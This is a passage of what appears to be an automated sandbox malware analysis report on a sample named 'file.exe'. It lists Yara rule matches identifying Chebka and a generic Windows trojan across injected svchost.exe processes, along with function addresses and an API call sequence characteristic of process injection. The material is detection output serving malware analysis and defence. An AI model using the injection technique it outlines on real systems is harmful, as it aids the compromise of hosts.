        Source: Yara matchFile source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4628, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4776, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5440, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2508, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 368, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2112, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2372, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2340, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1512, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1148, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2564, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1080, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3460, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1492, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1924, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1364, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3584, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1204, type: MEMORYSTR
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408E490_2_00408E49
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004098CD0_2_004098CD
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040AC8A0_2_0040AC8A
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004023070_2_00402307
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004029300_2_00402930
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040938B0_2_0040938B
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409F910_2_00409F91
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04631C605_2_04631C60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0465AC305_2_0465AC30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0463BC105_2_0463BC10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0463C5605_2_0463C560
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046515605_2_04651560
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04656D805_2_04656D80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04665F505_2_04665F50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04670FE15_2_04670FE1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0466D8115_2_0466D811
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0463C9B05_2_0463C9B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0465CB405_2_0465CB40
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF54F8407_2_0000022BAF54F840
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF54C6707_2_0000022BAF54C670
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF577C3C7_2_0000022BAF577C3C
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF53EBF07_2_0000022BAF53EBF0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF54B4707_2_0000022BAF54B470
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF560B407_2_0000022BAF560B40
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF574B2C7_2_0000022BAF574B2C
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5542D07_2_0000022BAF5542D0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5392D07_2_0000022BAF5392D0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5373907_2_0000022BAF537390
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5603607_2_0000022BAF560360
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF57A3767_2_0000022BAF57A376
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF53E2207_2_0000022BAF53E220
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF56A2C87_2_0000022BAF56A2C8
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5352807_2_0000022BAF535280
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF566A6C7_2_0000022BAF566A6C
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5411107_2_0000022BAF541110
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5381107_2_0000022BAF538110
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF56C1407_2_0000022BAF56C140
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5451907_2_0000022BAF545190
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF57A15D7_2_0000022BAF57A15D
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5481507_2_0000022BAF548150
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF56E0247_2_0000022BAF56E024
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF56C8107_2_0000022BAF56C810
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF57B0187_2_0000022BAF57B018
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF57B0487_2_0000022BAF57B048
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF545FD07_2_0000022BAF545FD0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF55C7D57_2_0000022BAF55C7D5
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF55C0857_2_0000022BAF55C085
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF550F107_2_0000022BAF550F10
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF55E6E07_2_0000022BAF55E6E0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF55BEED7_2_0000022BAF55BEED
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF532FA07_2_0000022BAF532FA0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF53F7507_2_0000022BAF53F750
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF54CF807_2_0000022BAF54CF80
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF548F707_2_0000022BAF548F70
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5446207_2_0000022BAF544620
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF546DD07_2_0000022BAF546DD0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF54E6607_2_0000022BAF54E660
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5396507_2_0000022BAF539650
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5704CC7_2_0000022BAF5704CC
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF540DC07_2_0000022BAF540DC0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF544DC07_2_0000022BAF544DC0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5625C07_2_0000022BAF5625C0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5575507_2_0000022BAF557550
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF55C57E7_2_0000022BAF55C57E
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5585707_2_0000022BAF558570
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF4702E87_2_0000022BAF4702E8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04649910 WaitForSingleObject,GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,CloseHandle,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,Sleep,Sleep,Sleep,Sleep,Sleep,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,5_2_04649910
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04643A60 OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,DeleteService,wsprintfW,SHDeleteKeyW,CloseServiceHandle,CloseServiceHandle,5_2_04643A60
        Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 25.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 25.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 25.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 7.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 7.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 7.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 18.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 18.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 18.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 9.2.svchost.exe.244fc400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 9.2.svchost.exe.244fc400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 9.2.svchost.exe.244fc400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 11.2.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 11.2.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 11.2.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 17.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 17.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 17.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 34.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 34.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 34.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 19.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 19.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 19.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 22.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 22.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 22.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 25.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 25.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 25.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 27.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 27.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 27.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 30.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 30.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 30.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 11.0.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 11.0.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 11.0.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 23.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 23.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 23.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 18.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 18.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
